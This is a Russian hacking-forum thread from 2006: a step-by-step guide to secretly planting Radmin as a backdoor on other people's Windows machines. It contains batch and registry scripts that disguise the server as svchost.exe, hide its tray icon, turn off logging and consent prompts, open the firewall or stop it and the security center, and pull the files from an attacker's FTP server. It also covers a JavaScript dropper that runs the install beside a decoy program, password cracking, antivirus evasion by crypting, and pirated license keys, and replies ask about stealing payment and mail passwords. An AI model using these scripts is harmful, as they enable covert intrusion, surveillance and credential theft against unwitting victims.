Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   АнтиАдмин (https://forum.antichat.xyz/forumdisplay.php?f=20)
-   -   Mega FAQ по Radmin'у (https://forum.antichat.xyz/showthread.php?t=13658)

Elekt 29.01.2006 19:27

Mega FAQ по Radmin'у
 
Intro

Помниться, летом уже прошедшего года, появилось вполне здоровое желание потренироваться в области троян-хака и возыметь определенную власть в местной локалке. Начились раскопки тырнета на предмет осваивания современных троев. (Кстати, кто там искал пинча? http://dkcs.void.ru/index.php?module=soft&page=troyans) . Именно тогда я заинтересовался радмином, а чуть позже узнал, что наш администратор именно с его помощью помогает бедным юзверям в их лам-делах. Какое совпадение =]

Как раз имено в то время в интернете начали появляться мануалы по установке\взлому радмина.
Просмотрев всё, что выплюнуло три поисковика, удалось собрать недетский хелп http://sec-123.narod.ru/radmin/1.rar

Запомните, порой всё что вам надо, делает сам разработчик. Я не раз убеждался в этом.
Поэтому READ THE FACKING MANUAL, мля !!! Где я и нашел практически всё, что нужно.
Дополнительная инфа из поисковиков добавило кучу вкусностей к пресному ману разработчика.

Почему именно Радмин?

1. Есть телнет, файловый менеджер, наблюдение и контроль за раб.столом, вкл\выкл компа.
2. Не палиться Касперским. НО УЧТИТЕ, что НОД его палит!!!
3. Возможность скрытой установки из консоли и малая палевность в системе.
4. Вобщем-то малый обём(не пинч конечно, но пайдёт)
5. Подержка прокси соединения на аналогичный радмин сервер(если ломать чужой радмин сервер).

Мы будем рассматривать версии от 2.0 до 2.2; они впринципе идентичные. Проги сами найдёте.
Привожу скучные коменты:

2.0
Serial_key: 08le-2jg4MggTuKc8bRD8VVC4O9107Hz1p7qkNUBRsGES4OdBDAnftk +ki2pQZHmM7lhysVBux8HE7udeSR0D1E0

2.1
Serial_key: 08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA 6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23

2.2
Serial_key: 08mi6OFGZ7xOssk3ECduXquHrrfBQksiZK0BHfuF17GAXvJybP iTRTCm7tsnRkyGTs-VSDTEzQjAe7BtlsguDiq1

Радмин контролирует правильность и безопасность настройки серверной части программы. Radmin Server 2.2 не позволяет задать пустой пароль.
Интеллекуальная защита от подбора пароля и DoS-атак. В версии 2.2 добавлены такие меры защиты, как анти-хакерская задержка, блокирование подозрительных IP-адресов, и т. д

3.0
Текстовый чат
Голосовой чат

По поводу совметимости версий - главное, чтобы клиент(вы с него конектитесь) был не старее сервера(его вы имеете =] ).
В качестве клиента советую юзать 3-ю версию(есть сканер порта+иконки типа файла в фаловом менеджере, имхо вери удобно).
Я использую по сей день 2.0 сервак. Просто переделывать всё, что забацал на нём под другие версии просто влом =]

Все операции приведны для 2.0 сервера.
===============Скрытая Установка==================
+++++Введение++++++
Допустим, вы хакнули систему сплоитом(MS09-039_RPC-3, ms04-011, и др.) и смотрите на консоль с правами System.
Загрузим и запустим ниже рассмотренные файлы.

Для работоспобности серверной части достаточно трёх файлов:
r_server.exe - сам сервак
AdmDll.dll - необходимая длл
raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола)

Между прочим, если просто стартануть сервак без всякой установки, он заработает!!! Вход без пароля.
Однако, тут же палит себя в трее. Чтобы этого не случилось, необходимо прописаться в реестре

Вот список ключей в реестре:
[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Param eters]
"NTAuthEnabled" - авторизация по юзеру (0-входит любой)
"Parameter" - пароль
"DisableTrayIcon" - 0 - без иконки в трее
"Port" - (стандартный порт сервера 4899)
"EnableLogFile" - 0 - отключено ведение логов
"LogFilePath" - пкть к логфайлу
"FilterIp" - фильтр айпишников.
"AskUser" - 0 - не спрашивать у юзверя разрешение на взлом =]

Сам же сервер автогрузиться как служба.

+++++Настройки скриптов.+++++
Самый кайф в том, что сервак может запускаться из ЛЮБОГО места (хоть из C:\RECYCLER), лишь бы там же были AdmDll.dll и raddrv.dll.
И назвать его можно как угодно. Переименуем r_server.exe в svchost.exe .

Путём проб и ошибок были составлены следующие скриптики: http://sec-123.narod.ru/radmin/4.rar

111.bat - автозапуск всего безобразия.
Сначала в правила встроенного в ХР фаервола добавляеться новое правило.
Затем извлекаються все записи из реестра в 123.reg про Радмин, если он был уже установлен.
Происходит автокопирование в системную папку(например, C:\Windows\).
Установки радмина обновляються на ваши(два варианта под 2000 и ХР)
Установка и запуск сервера.

Код:

@echo off
echo FATAL ERROR! PLEASE, WAIT TO CONTINUE...
netsh firewall add allowedprogram "%Windir%\svchost.exe" "Remote Administrator Server" ENABLE
reg export "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" 123.reg
reg delete  "HKEY_LOCAL_MACHINE\SYSTEM\RAdmin" /f
copy /y "svchost.exe" "%SYSTEMROOT%/svchost.exe"
copy /y "raddrv.dll" "%SYSTEMROOT%/raddrv.dll"
copy /y "admdll.dll" "%SYSTEMROOT%/admdll.dll"
reg import 111.reg
regedit /s 111.reg
"%SYSTEMROOT%/svchost.exe" /install /silence
"%SYSTEMROOT%/svchost.exe" /start

111.reg
Здесь в параметрах зашиты следующие установки:
- вход с любого айпи
- пароль 123456789
- не показывать иконку в трее
- порт 4899
- не логировать
- не спрашивать разрешение на конект
- прописка лицензии для вечной работы =]

Код:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist]

[HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters]
"NTAuthEnabled"=hex:00,00,00,00
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce,1a
"DisableTrayIcon"=hex:01,00,00,00
"Port"=hex:23,13,00,00
"EnableLogFile"=hex:00,00,00,00
"LogFilePath"="c:\\logfile.txt"
"FilterIp"=hex:00,00,00,00
"AskUser"=hex:00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType]
"Data"=hex:95,f3,0b,13,44,c0,10,74,7b,2e,83,2c,f5,89,e4,b9,49,c8,49,00,1c,eb,\
  18,64,87,46,c5,78,59,73,2a,6a,13,72,53,9e,e4,f5,74,94,4f,49,42,46,f7,ab,05,\
  1f,55,24,72,79,e9,85,c8,8a,1e,5e,e3,d8,35,70,06,28


===================№3 Взлом Сервера Радмина==================
Раскажу про способы.

++++Доступ к реестру++++
У многих компов разрешен доступ на чтение реестра!
Юзать надо так через командную строку.
Для хелпа наберите
reg /? - для ХР
regedit /? - для 2000

REG COPY \\ZODIAC\HKLM\SYSTEM\RAdmin HKLM\Software\Hacker
Копирует все параметры раздела RAdmin с компьютера ZODIAC
в раздел HKLM\Software\Hacker на локальном компьютере.

Затем лезем к себе в реестр и копируем значение в *.txt файл.
HKLM\Software\Hacker\v2.0\Server\Parameters]
"Parameter"=??????????????????????????????????

Берем PasswordPRO, скармливаем ей наш txt-файл с паролем, выбирая алгоритм RADMIN, и ждём результата.

Кстати, если изменить пароль в реестре, изменение подействует без всяких перезагрузок сервера радмина.
И при следующем коннекте он будет уже действителен. Текущая сессия не прервётся при смене пароля.

+++++Подбор пароля++++
В инете мне попадалось на глаза всего два публичных радмин-брута.
Первый был на народе, но мне не посчастливилось его скачать - сайт прикрыли.
Есть второй вариант, по хуже, на зато рабочий. Выполнен на *.vbs скрипте.
Скорость фиговая, но для автоматизации перебора по словарю годиться.
Помните, что в 2.2 версии есть защитные механизмы от брута...
http://sec-123.narod.ru/radmin/2.rar

+++++Впаривание Радмина++++
Самый лучший способ - взять выше выложенные скрипты, оформить инструкции,
упаковать инсталлером с какой-нить прогой и впарить ламеру.

Вот, как это сделать без инсталлера.
Можно невидимо пустить bat-файл через ява-скрипт:
_README.js

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("111.bat",0);

var WSHShell = WScript.CreateObject("WScript.Shell");
WSHShell.Run("screenseiver.scr",1);

Запуститься сначала установка радмина, а за ней какая-нить типа полезная прога.
http://sec-123.narod.ru/radmin/6.rar

+++++Как не спалиться++++
Если вы подобрали пароль на уже установленный радмин, советую заменить r_server.exe на пропатченную версию.
Дело в том, что иконка в трее при отсутствии соединений СИНЯЯ, а при наличии таковых - КРАСНАЯ.
Достаточно каким-либо редактором иконок поменять Красную на Синюю... http://sec-123.narod.ru/radmin/5.rar
Учтите, иногда перезапуск сервиса радмина возможен только после перезагрузки системы. Такой вот глюк.
Также, убедитесь в отсутствии логирования в реестре(см. выше).
Для конспирации при впаривании можно зашифровать батник, или сконвертировать его в *.com (http://sec-123.narod.ru/radmin/3.rar)

================================================

Ничего не забыл?...

Elekt 29.01.2006 19:35

Кстати, совсем недавно, в выпуске Мазафаки под новый год была вот эта статья, написанная eXp.l0ziv.

Привожу её содержание. Важным достоинством считаю выполнение опереций с реестром без переходного рег-файла, напрямую из командной строки. Учтите, некоторые фичи работают лишь для радмина выше 2.1.

0х01. Интро
-----------

Последнее время участились просьбы на форумах о помощи закрепиться на Windows-машинах, да и в ICQ почему-то спрашивают вопросы именно такого рода...и именно про RAdmin. Поэтому, чтобы не обьяснять каждому что к чему, я решил об этом написать...
Итак... Совершенно не важно как вы получили доступ к машине с ОС Windows (локально или удалённым сплойтом), важно что у вас есть потребность в последующем использовать ресурсы и/или данные этой машины. Способов оставить себе лазейку множество... от бинда порта до установки троянов. Один из многих - это установка RAdmin. Приступим.

0х02. Теория
------------

Да-да... именно теория, так как выяснилось что многие люди незнают коммандной оболочки и что такое *.bat-файлы. Из данной области надо хотя бы знать как пользоваться FTP через cmd.exe =) Придумывать ничего не надо, вот хэлп:

Синтаксис:

ftp [-v] [-d] [-i] [-n] [-g] [-s:имя_файла] [-a] [-w:размер] [-A] [Ведомый компьютер]

... из параметров нам понадобится только:

-v = Запрещает вывод на экран ответа FTP-сервера;
-n = Запрещает автоматический вход в систему в ходе начального подключения;
-s:имя_файла = Указывает текстовый файл с ftp-командами.
Эти команды выполняются автоматически после запуска команды ftp. ;

Также советую почитать справку по коммандам - REG ADD, netsh firewall, net stop/start, чтобы хотябы понимать, что мы будем делать далее...

0х03. Процесс установки
-----------------------

Пользоваться будем RAdmin'ом 2.1 Из все кучи файлов нам нужны только:
r_server.exe, AdmDll.dll, raddrv.dll. Вот что написано в хэлпе:

Usage: r_server.exe options

Options:

/setup - show window dialog box with setup settings (install,remove,port,pass)
/pass:xxxxx - specify a password
/port:xxxxx - specify a port number
/install - install service (Win95/98 or WinNT) and driver (WinNT)
/uninstall - uninstall service and driver, if present
/save - save pass & port to the defau lt program settings in the registry if you not
specify port or\and pass when use this option, default port or\and empty
password will be saved.
/silence - dont show message boxes,in /install, /uninstall or /save commands.
/unregister - delete an already entered key for Radmin.
/? - this help screen

Note, that port and password specified in the command prompt,
always overrides default settings from the registry.

Отсюда видно, что для установки RAdmin'a в коммандной строке необходимо набрать:

CMD>r_server.exe /install /silence
CMD>r_server.exe /port:порт /pass:пароль /save /silence

Всё... RAdmin установлен и его можно использовать. НО! На данном этапе он слишком заметен
из-за иконки в трэе. Для того чтобы её убрать необходимо добавить в реестр несколько
ключей:

В [HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters] - ключ "DisableTrayIcon", тип - REG_BINARY,
значение - 00000001.
В [HKLM\SYSTEM\CurrentControlSet\Services\r_server] - ключ "DisplayName", тип - REG_SZ,
значение - "Service Host Controller".

Сделать это можно коммандами:

CMD>REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
CMD>REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

0х04. Автоматизация
-------------------

Всё это, конечно, хорошо, но занимает некоторое время. Поэтому было бы неплохо,
сократить количество действий. Для этого напишем *.bat-файл примерно такого содержания:

@echo off
echo open [Adress_FTP]>ra.pif // [Adress_FTP] - адресс FTP-сервера
echo [user] [pass] a>>ra.pif // [user] - логин, [pass] - пароль
echo binary>>ra.pif
echo GET AdmDll.dll [Path]\AdmDll.dll>>ra.pif //
echo GET raddrv.dll [Path]\raddrv.dll>>ra.pif // [Path] - путь к файлам
echo GET r_server.exe [Path]\r_server.exe>>ra.pif //
echo bye>>ra.pif
ftp -v -n -s:ra.pif
c:\windows\r_server.exe /install /silence
c:\windows\r_server.exe /pass:123 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
c:\windows\r_server.exe /stop
c:\windows\r_server.exe /start

0х05. Утилизация файрвола
-------------------------

Часто бывает так, что на машине включён фаерволл (пусть даже стандартный) и он нам мешает. В случае с Windows у нас есть 2 пути: отключть его либо добавить необходимые правила. Рассмотрим каждый из них в отдельности.
Итак, как же отключить стандартный фаерволл? В ОС Windows фаерволом является - служба "Брандмауэр Windows/Общий доступ к Интернету (ICS)" или по-простому - sharedaccess.
Останавливается он командой:

CMD>NET STOP "Брандмауэр Windows/Общий доступ к Интернету (ICS)"
либо
CMD>NET STOP sharedaccess

но тут есть свои нюансы... при попытке отключения этой службы - пользователь получит сообщение с предупреждением о небезопасности этого действия. Это неприемлемо! Следовательно нужно сделать так чтобы этого не произошло. За выдачу таких сообщений отвечает служба "Центр обеспечения безопасности" (по-простому - wscsvc). С ледовательно перед отключением фаера, необходимо отключить эту службу одной из двух комманд:

CMD>NET STOP "Центр обеспечения безопасности"
либо
CMD>NET STOP wscsvc

Теперь перейдём к более элегантному методу - добавлению необходимого правила для фаера. В Win XP SP2 модифицировать и добавлять правила можно коммандой netsh firewall. Вот небольшая справка:
Группа
Команда
Описание

Добавление конфигурации
netsh firewall add allowedprogram
netsh firewall add portopening Добавление разрешенной программы в брандмауэр Windows. Добавление конфигурации порта в
брандмауэр Windows

Удаление
netsh firewall delete allowedprogram
netsh firewall delete portopening Удаление разрешенной конфигурации
программы из брандмауэра Windows
Удаление конфигурации порта из
брандмауэра Windows

добавить правило можно одной коммандой:

CMD>netsh firewall add allowedprogram C:\Progra~1\Radmin\r_server.exe systerm enable
либо
CMD>netsh firewall add portopening TCP 4899 systerm
где systerm - просто назване правила.

Если же на машине установлен не SP2, то придётся поработать добавляя нужные ключи к реестру уже знакомой коммандой REG ADD.

Каким бы способом вы не отключали брандмауэр - удобнее дописать все необходимые комманды в уже созданый в *.bat-файл...

0х06. Ауттро
------------

Несмотря на лёгкость и элегантность этого метода, у него всё же есть несколько минусов, а именно:

- открытый порт 4899. Спрятать средствами RAdmin'a его нельзя. Можно только поменять, добавив при установке ключ /port:[порт];
- Добавляется новый сервис (служба);
- Добавляются записи в реестр;
- Заметен для антивирусов;
- Светиться в процессах. Устраняется путём переименовывания exe-шника во что-нибуть неприметное,
например - svhost.exe =)
- некоторые комманды доступны только в WinXP SP2.

0х07. Ссылки
------------

- http://www.cyberlords.net - Оригинал статьи
- http://www.cyberlords.net/... - сканер радмин серверов с пустым паролем
- http://www.blacklogic.net/ - Анализ системы удаленного контроля NTRootKit, E-Zine FH0, 0x01
- http://www.famatech.com/support/faq.php - FAQ, офф-сайт RAdmin'a
- http://www.radmin.com - офф-сайт RAdmin'a
- http://www.rootkit.com
- http://www.ucl.ac.uk/cert/win_intrusion.pdf
- http://www1.umn.edu/oit/img/assets/5...wsRootkits.pdf - презентация с конференции Defcon
- http://www.windowsecurity.com/articl...vironment.html

Автор: eXp.l0ziv

Elekt 14.02.2006 01:55

Испытывал трудности с Нодом. После некоторого секса удалось закриптовать файлы. Вот криптованый радмин v2.0 ). Не палиться Нодом Nod32 2.50.25 с базами от 10-го февраля. Касперский со стандартными базами не реагирует, с расширенными палит.

В процессе выяснилось - Нод спотыкается о древнейшие грабли 2002 года, на которые попадался Касперский. При смене точки начала загрузки (прога topo12.exe) трояна - Нод перестаёт его видеть =]

podkashey 15.02.2006 17:49

Цитата:

Сообщение от Elekt
Испытывал трудности с Нодом. После некоторого секса удалось закриптовать файлы. Вот криптованый радмин v2.0 ). Не палиться Нодом Nod32 2.50.25 с базами от 10-го февраля. Касперский со стандартными базами не реагирует, с расширенными палит.

В процессе выяснилось - Нод спотыкается о древнейшие грабли 2002 года, на которые попадался Касперский. При смене точки начала загрузки (прога topo12.exe) трояна - Нод перестаёт его видеть =]

Спасибо, теперь плохие дяди будут жить плохо... Как и положено.
+ к репе. ;)

SanyaX 15.02.2006 22:39

Молодец хорошее Faq!

KEZ 16.02.2006 00:52

Согласен, информативно. Теперь будет ссылка что надо даваь при вопросах "че такое радмин икак его использовать"

Duke Nukem 17.02.2006 01:53

Radmin - это тема!!!
Скину своему преподу по проге... :)

[Zarakul] 17.02.2006 07:16

МегаРеспект за МегаСтатью =), +

=Be$= 18.02.2006 02:44

Elect молодец. :)

SOFTmaster :) 18.02.2006 15:58

Отлично :)

Ponchik 07.03.2006 00:26

Даешь RAdmin! =)
У меня вопрос... Я смотрел видео от Elekt, тама в XSpider профилях есть DefaultOff у меня такого нету, есть Default, но тогда пишет
Сканирование хоста не производилось, так как хост не отвечает на ICMP запросы. Чтобы выполнить сканирование необходимо выбрать соответствующий профиль (например: "DefaultOff.prf").
И чё мне делать? =(

Elekt 07.03.2006 00:50

Сменить профиль сканирования. На всякий случай вот несколько хороших доработанных профилей. Их в более старших версиях разработчики просто убрали, типа защита от дурака.

http://sec-123.narod.ru/Profiles.rar
http://rapidshare.de/files/14864179/Profiles.rar.html

Ponchik 07.03.2006 11:14

Ага... Пасибо!

Не понимаю... Просканировал 75 IP адресов, и ничего, неужели у всех файрволл?! Или я что-то не то сканирую... 445 / tcp - Это? :confused:

donetsk 07.03.2006 14:41

Вопрос по радмину:есть лок машина доступ туда есть полный , как шары, так телнет , ну в общем что угодно, кроме физического доступа!
Как удобнее сделать так чтобы можно было закидывать радмина под svchost.exe запускать его удаленно так чтобы он не жил в трее, работать через внешние айпи с этой машины(машина эта имеет реал айпи) далее после завершения работы из внешних айпи, закрывать радмина !
Как это проще сделать ? через телнет я смогу запустить радмина, и добавить ключи а реест , которые вынесут его из трея?

Ещё вопрос сможет ли радмин вырубить самого себя, если я подрубаюсь на raserver.exe и запускаю cmd kskill raserver.exe !
Сможет ли радмин снять самого себя, или выполнить эту cmd команду?

Т.е. ,если я удаленно с внешнего IP подрубаюсь на IP с радмином, работаю , а потом снимаю из процессов радмина сервера, снимаю с самого радмина?
Получиться ли так?


через tskill r_server не получается, получается снять с 3-х кнопок, но если подключаться через телнет с удаленно IP , то 3 кнопки не катируются :(
как можно его вынести?

Elekt 07.03.2006 15:21

Про запуск из телнета и скрытие из трея читай выше.

Если б ты удосужился скачать вот ЭТОТ архивчик, то обнаружил в нём DEL.bat . Кажется я его оставлял там при архивации.

Поясню, вырубить радмин можно двумя способами.

Способ_1. Цивилизованный.
Радмин предусматривает остановку своего сервиса командой:
Код:

C:\Windows\r_server.exe /stop
Способ_2. Универсальный.
Дёшево и сердито.
Код:

taskkill /IM r_server.exe /F /T
или предварительно посмотрев PID радмина командой
Код:

tasklist
например, пид равен 1234, тогда пишем
Код:

taskkill /PID 1234 /F /T
Если ты это делаешь из под консоли радмина - связь должна характерно отрубиться =]

donetsk 07.03.2006 16:19

Elektтопик давно, скачал, но проблема в том, что радмина закинул, допусим внес изменения в реестр, но веть для того чтобы он заработал нужно ресет машины, или же ресет выполняется только после первого заселения?
Если заселять только
AdmDll.dll
raddrv.dll
svchost.exe
Запустив svchost.exe , он будет запущен от имени учетной записи, как его снять понял , спасибо за подсказку!

Ponchik 07.03.2006 18:23

А мне скажите кто-нибудь =*( Какой порт надо сканировать? 445 / tcp?

Ладно... На тупые вопросы не отвечаете :(

donetsk 08.03.2006 01:02

Ponchik помоему радмину всё равно на каком порту висеть главное выше 5001 и ниже 10000 и чтобы порт был не занят ничем, может я ошибаюсь, исправьте тогда!

Elekt 08.03.2006 03:17

Полезные ссылки по сабжу:

Как выключить монитор через командную строку

Взлом протокола Радмина. Помогаем автору

Нужэн брут под radmin

Ставим radmin через win shell

Борьба с админом, а точнее с R_admin

=================================
Лучше бы закрыть тему.

Exodus 31.03.2006 01:03

Подскажите, пожалуйста, что надо добавить в рег файл, что бы радмин запускался при загрузки винда.

DEQ 01.04.2006 20:56

Код:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):22,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,76,00,41,04,68,00,6f,00,73,00,74,00,2e,00,65,00,78,00,65,00,22,00,20,00,2f,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,00,00,00,00
"DisplayName"="Remote Administrator Service"
"ObjectName"="LocalSystem"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server\Security]
"Security"=hex:01,00,14,80,90,00,00,00,9c,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,60,00,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,00,00,00,00,00,05,12,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,8d,01,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,fd,01,02,00,01,02,00,00,00,00,00,05,20,00,00,00,23,02,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\r_server\Enum]
"0"="Root\\LEGACY_R_SERVER\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001


Grema 03.04.2006 23:35

Я вот закинул РАдмина на комп... удаленный доступ... и т.д. но меня интересует как скамуниздить пассы от ВебМани, от Мыля, Аси и т.д.?

и еще как можно полазить по сетки, если она есть?

NaX[no]rT 04.04.2006 00:05

Запусти у него нужные программы и будет тебе счатсье, от вебмани тебе потребуются еще ключи (:
Вроде всЁ )

Allen 04.04.2006 00:48

Зверская статья.
ОТЛИЧНО!!!

Grema 04.04.2006 22:19

Цитата:

Сообщение от NaX[no]r†
Запусти у него нужные программы и будет тебе счатсье, от вебмани тебе потребуются еще ключи (:
Вроде всЁ )

А поточнее о прогах можно?

banall 01.07.2006 06:01

Возникла проблема, все сделал как здесь описано, но при запуске viewera при подключении к хосту возникает проблема.
короче коннектюсь
ввожу пароль, а дальше выскакивает окошко loading initial screen и все пропадает и ноль эмоций
у меня система windows 2003 sp1
у удаленного компа windows 2003

при подключении к другим компам с win 2000 или win xp все пашет.

подскажите плз, в чем дело, может это не работает для win 2003?

banall 02.07.2006 00:28

Как оказалось этот faq бесполезен для windows 2003 server, а так как эту версию в основном используют админы, то лучше научиться использовать удаленный рабочий стол.
При подключении к radmin установленный на другой машине не работает видео драйвер, а только телнет.
ну а если вы смогли через шелл залить софт тогда вам telnet нафиг не нужен.

короче статья мусор и старье.

автор почитай офиициальный форум radmin, столько ошибок и несуразностей наверное есть только у IE.

Elekt 19.07.2006 00:02

Наконец вышла третья более менее рабочая ветка Радмина.


Серверная часть.

До этого сервак бетки разрешпл лиш чат и голосовое общение.
Теперь и весь основной функционал работает.

Советую все качнуть пока ещё бесплатную 3-бетту, а то потом будете лицензию искать.

Да, под 2003 виндой в старых версиях не работал раб.стол, но и без этого жить можно, вы же не фильм залезли посмотреть =)
Теперь добавлена поддержка рабстола в Win2003 на уровне драйвера:
"Supports Windows 95/98/Me/NT4/2000/XP/2003, full Windows XP compatibility"
...а в "Диспетчере Устройств" у вас будет почётно красоваться "Radmin Mirror Driver V3" рядом с видюхой и тюнером.

Пока сервер не палится антивирусами :)

Теперь о неприятном:
- иконку из трея убрать просто так нельзя.
Видимо, это особенность этой версии и возможно, что позже всё вернут.
В настройках нет такого пункта. Но даже после прямой прописки параметра в реестре сервер просто отказывается запускаться.
Редактирование иконки сервера на бесцветную также не даёт желаемого результата(встроена какая-то проверка целостности).
- Установку из консоли убрали, потому просто так нельзя его поднять из командной строки, хотя управлять по прежнему можно(/start /stop).
Нужно для начала прописать драйвер в системе через реестр(Название сервиса "Radmin Server V3"), тогда он появится(внимание, потребуется перезагрузка).
Помните, что теперь ВСЕ параметры в реестре шифруются, потому нужно заранее сконфигуроровать сервак у себя, а затем сделать экспорт из реестра и внести его в реестр жертвы.
У меня в реестре за службу третьего радмина отвечают : http://sec-123.narod.ru/radmin/Radmin_3.rar
Для работоспособности серверу требуется несколько файлов. Поддержку каждого модуля реализует отдельная библиотека.
Рабочая директория: "C:\WINDOWS\system32\rserver30\"
В "C:\Program Files\Radmin Server 3.0"
только деинсталятор.


Теперь о клиенте(вьювер).

Внимание! Вьювер они тоже обновили, причём старый третий вьювер не совместим с новым сервером.
Так что не ленитесь - закачать новый.
Как всегда, вьювер 3 совместим со всеми 2.х серверами радмина.


Незабывайте, что база контактов в 2.х вьюверах была в [HKEY_CURRENT_USER\Software\RAdmin\v2.0\Clients],
а в 3-ем вьювере она хранится "C:\Documents and Settings\username\Application Data\Radmin\radmin.rpb"
Это я к тому, что гуляя по чужой машине незабудьте проверить эти места - в хозяйстве пригодятся =)

Кстати, вьювером можно управлять из командной строки!
Только не знаю, зачем нужно такое извращение, разве что для написания авто-скриптов, например, для массового выключения парка копьютеров по окончании раб.дня. В хелпе найдёте ключи управления.

По поводу настроек сервера в реестре.
Идём в хелп - как, всегда всё что надо =)
Код:

IP filter settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\FilterIp
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\iplist\

Show confirmation dialog option:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\AskUser

Sets default value of auto-answer:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\AutoAllow

Disable tray icon flag option:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableTrayIcon

Logfile settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\EnableLogFile
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\LogFilePath

Password for Radmin server (encrypted):
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\Parameter

Port number settings:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\Port

Enable NT security flag:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\NTAuthEnabled

User list for NT security support:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Users\

Disallows changes:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisallowChanges

Disables beep:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableBeep

Disables various connection types:
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableRedirect
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableScreen
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableView
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableTelnet
HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v3.0\Server\Parameters\DisableFile

License key:
HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v1.01\ViewType\Data


Uninstallation:

To uninstall execute:
%windir%\system32\r_server.exe /stop
%windir%\system32\r_server.exe /uninstall /silence
Delete all Radmin files.





Elekt 19.07.2006 14:14

Да, кстати, насчёт Remote Desktop.

Подробное описание здесь:
ХР-АДМИНИСТРАЦИЯ - удаленный помощник WinXP

Замечу, что для Win2003 не требуется завершение сеанса активного пользователя! :)
У вас появляется раб стол юзера, но при этом мышка и клава у вас "своя" :)
Таким образом Вы НИЧЕМ не выдаёте своё присутствие, в отличие от управления Радмином.

Вот параметры в реестре, активирующие Remote Desktop (без перезагрузки).
Код:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server]

"fAllowToGetHelp"=dword:00000001
"fDenyTSConnections"=dword:00000000

Да, должна быть запущена "Cлужба терминалов" (в Win2003 запущена по дефаулту, в ХР - нет)
Посмотреть список запущенных служб так:
Код:

net start
Если нет "Cлужба терминалов" - запустить так:
Код:

net start RdpDr

UM9I 29.07.2006 14:18

А он неведёт некаких логов..? Есть вазможность проверить после работи..,с какого ип конектилисй.., и так далее? Или ето более мениее безопасно..?

sergeich 29.07.2006 16:26

Цитата:

Сообщение от UM9I
А он неведёт некаких логов..? Есть вазможность проверить после работи..,с какого ип конектилисй.., и так далее? Или ето более мениее безопасно..?

Если стоит соответствующая галка в настройках radmin'a - то логи ведуться.

UM9I 29.07.2006 23:45

Яфна, а как проверить она тиам стоти или нет..?

sergeich 01.08.2006 11:40

Цитата:

Сообщение от UM9I
Яфна, а как проверить она тиам стоти или нет..?


Смотри первую страничку топика

"EnableLogFile" - 0 - отключено ведение логов
